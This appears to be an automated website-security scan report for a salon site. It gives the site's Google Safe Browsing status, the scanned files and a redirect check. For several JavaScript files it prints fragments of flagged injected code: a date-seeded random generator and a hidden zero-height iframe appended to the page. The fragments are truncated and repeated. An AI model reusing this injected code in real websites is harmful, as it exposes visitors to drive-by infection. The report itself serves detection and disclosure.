Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=salon-de-angela.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.salon-de-angela.com/ | 200 OK Content-Length: 6185 Content-Type: text/html | clean |
http://www.salon-de-angela.com/./cgiFolder/tieredworks_base.js | 200 OK Content-Length: 15081 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ??? var TWDDMenu = { TimeOut : 300, currentLayer : null, currentitem : null, currentLayerNum : 0, noClose : 0, closeTimer : null } function TW_mopen(id) { var n = id.slice(5); var l = document.getElementById("smenu"+n); var mm = document.getElementById("mmenu"+n); if(l) { TW_mcancelclosetime(); l.style.display='block'; if(TWDDMenu.currentLayer && (TWDDMenu.currentLayerNum != n)) { TWDDMenu.curre Antivirus reports:
| ||
http://www.salon-de-angela.com/./cgiFolder/tieredworks_ajax.js | 200 OK Content-Length: 18635 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function TW_createHttpRequest(){ if (window.XMLHttpRequest){ return new XMLHttpRequest(); } else if (window.ActiveXObject) { try { return new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { return new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) { return null; } } } else { return null; } } function TW_requestFile( data , method , fileName , async , callback, dir) { try { var Decoded script: function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix*1000); var s = d.getHours() > 12 ? 1 : 0; this.seed = 2345678901 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return Antivirus reports:
| ||
http://www.salon-de-angela.com/./cgiFolder/tieredworks_modules.js | 200 OK Content-Length: 22530 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function TW_browserCheck() { var browser; var agt= window.navigator.userAgent; if (agt.indexOf('IE') != -1) { browser = 0; } else if (agt.indexOf('Firefox') != -1) { browser = 1 } else { browser = 2 } return browser; } function TW_calender(UID,year,month,kind) { var now = new Date(year,month-1,1); var Y = now.getFullYear(); var M = now.getMonth(); var startDay = now.getDay(); var calData = eval(UID + 'calData') Decoded script: function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix*1000); var s = d.getHours() > 12 ? 1 : 0; this.seed = 2345678901 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return Antivirus reports:
| ||
http://www.salon-de-angela.com/./cgiFolder/tieredworks_spry.js | 200 OK Content-Length: 138523 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Spry; if (!Spry) Spry = {}; if (!Spry.Widget) Spry.Widget = {}; Spry.Widget.ValidationSelect = function(element, opts) { this.init(element); Spry.Widget.Utils.setOptions(this, opts); var validateOn = ['submit'].concat(this.validateOn || []); validateOn = validateOn.join(","); this.validateOn = 0 | (validateOn.indexOf('submit') != -1 ? Spry.Widget.ValidationSelect.ONSUBMIT : 0); this.validateOn = this.validateOn | (validateOn.indexOf('blur') != - Antivirus reports:
| ||
http://www.salon-de-angela.com/./cgiFolder/analysis/admin/js/ana.js | 200 OK Content-Length: 10616 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var ana = new Object( { scriptName:'ana', scriptVersion:'0.1', useAjax:true, qs:'', reqMethod:'POST', _n:navigator, _d:document, createQueryString:function(site, siteId, page, pageId, sub, subId, uid, attr){ this.qs += 'action_logAPI=true'; this.qs += '&sn=' + this.scriptName; this.qs += '&sv=' + this.scriptVersion; this.qs += '&site=' + encodeURIComponent(site); this.qs += '& Decoded script: function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix*1000); var s = d.getHours() > 12 ? 1 : 0; this.seed = 2345678901 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return Antivirus reports:
| ||
http://www.salon-de-angela.com/./index.html | 200 OK Content-Length: 6185 Content-Type: text/html | clean |
http://www.salon-de-angela.com/././cgiFolder/tieredworks_base.js | 200 OK Content-Length: 15081 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ??? var TWDDMenu = { TimeOut : 300, currentLayer : null, currentitem : null, currentLayerNum : 0, noClose : 0, closeTimer : null } function TW_mopen(id) { var n = id.slice(5); var l = document.getElementById("smenu"+n); var mm = document.getElementById("mmenu"+n); if(l) { TW_mcancelclosetime(); l.style.display='block'; if(TWDDMenu.currentLayer && (TWDDMenu.currentLayerNum != n)) { TWDDMenu.curre Antivirus reports:
| ||
http://www.salon-de-angela.com/././cgiFolder/tieredworks_ajax.js | 200 OK Content-Length: 18635 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function TW_createHttpRequest(){ if (window.XMLHttpRequest){ return new XMLHttpRequest(); } else if (window.ActiveXObject) { try { return new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { return new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) { return null; } } } else { return null; } } function TW_requestFile( data , method , fileName , async , callback, dir) { try { var Decoded script: function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix*1000); var s = d.getHours() > 12 ? 1 : 0; this.seed = 2345678901 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return Antivirus reports:
| ||
http://www.salon-de-angela.com/././cgiFolder/tieredworks_modules.js | 200 OK Content-Length: 22530 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function TW_browserCheck() { var browser; var agt= window.navigator.userAgent; if (agt.indexOf('IE') != -1) { browser = 0; } else if (agt.indexOf('Firefox') != -1) { browser = 1 } else { browser = 2 } return browser; } function TW_calender(UID,year,month,kind) { var now = new Date(year,month-1,1); var Y = now.getFullYear(); var M = now.getMonth(); var startDay = now.getDay(); var calData = eval(UID + 'calData') Decoded script: function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix*1000); var s = d.getHours() > 12 ? 1 : 0; this.seed = 2345678901 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return Antivirus reports:
| ||
http://www.salon-de-angela.com/././cgiFolder/tieredworks_spry.js | 200 OK Content-Length: 138523 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Spry; if (!Spry) Spry = {}; if (!Spry.Widget) Spry.Widget = {}; Spry.Widget.ValidationSelect = function(element, opts) { this.init(element); Spry.Widget.Utils.setOptions(this, opts); var validateOn = ['submit'].concat(this.validateOn || []); validateOn = validateOn.join(","); this.validateOn = 0 | (validateOn.indexOf('submit') != -1 ? Spry.Widget.ValidationSelect.ONSUBMIT : 0); this.validateOn = this.validateOn | (validateOn.indexOf('blur') != - Antivirus reports:
| ||
http://www.salon-de-angela.com/././cgiFolder/analysis/admin/js/ana.js | 200 OK Content-Length: 10616 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var ana = new Object( { scriptName:'ana', scriptVersion:'0.1', useAjax:true, qs:'', reqMethod:'POST', _n:navigator, _d:document, createQueryString:function(site, siteId, page, pageId, sub, subId, uid, attr){ this.qs += 'action_logAPI=true'; this.qs += '&sn=' + this.scriptName; this.qs += '&sv=' + this.scriptVersion; this.qs += '&site=' + encodeURIComponent(site); this.qs += '& Decoded script: function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix*1000); var s = d.getHours() > 12 ? 1 : 0; this.seed = 2345678901 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return Antivirus reports:
| ||
http://www.salon-de-angela.com/././index.html | 200 OK Content-Length: 6185 Content-Type: text/html | clean |
http://www.salon-de-angela.com/./././cgiFolder/tieredworks_base.js | 200 OK Content-Length: 15081 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ??? var TWDDMenu = { TimeOut : 300, currentLayer : null, currentitem : null, currentLayerNum : 0, noClose : 0, closeTimer : null } function TW_mopen(id) { var n = id.slice(5); var l = document.getElementById("smenu"+n); var mm = document.getElementById("mmenu"+n); if(l) { TW_mcancelclosetime(); l.style.display='block'; if(TWDDMenu.currentLayer && (TWDDMenu.currentLayerNum != n)) { TWDDMenu.curre Antivirus reports:
| ||
http://www.salon-de-angela.com/./././cgiFolder/tieredworks_ajax.js | 200 OK Content-Length: 18635 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function TW_createHttpRequest(){ if (window.XMLHttpRequest){ return new XMLHttpRequest(); } else if (window.ActiveXObject) { try { return new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { return new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) { return null; } } } else { return null; } } function TW_requestFile( data , method , fileName , async , callback, dir) { try { var Decoded script: function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix*1000); var s = d.getHours() > 12 ? 1 : 0; this.seed = 2345678901 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: salon-de-angela.com
Result:
GET / HTTP/1.1
Host: salon-de-angela.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: salon-de-angela.com
Referer: http://www.google.com/search?q=salon-de-angela.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: salon-de-angela.com
Referer: http://www.google.com/search?q=salon-de-angela.com
Result:
The result is similar to the first query. There are no suspicious redirects found.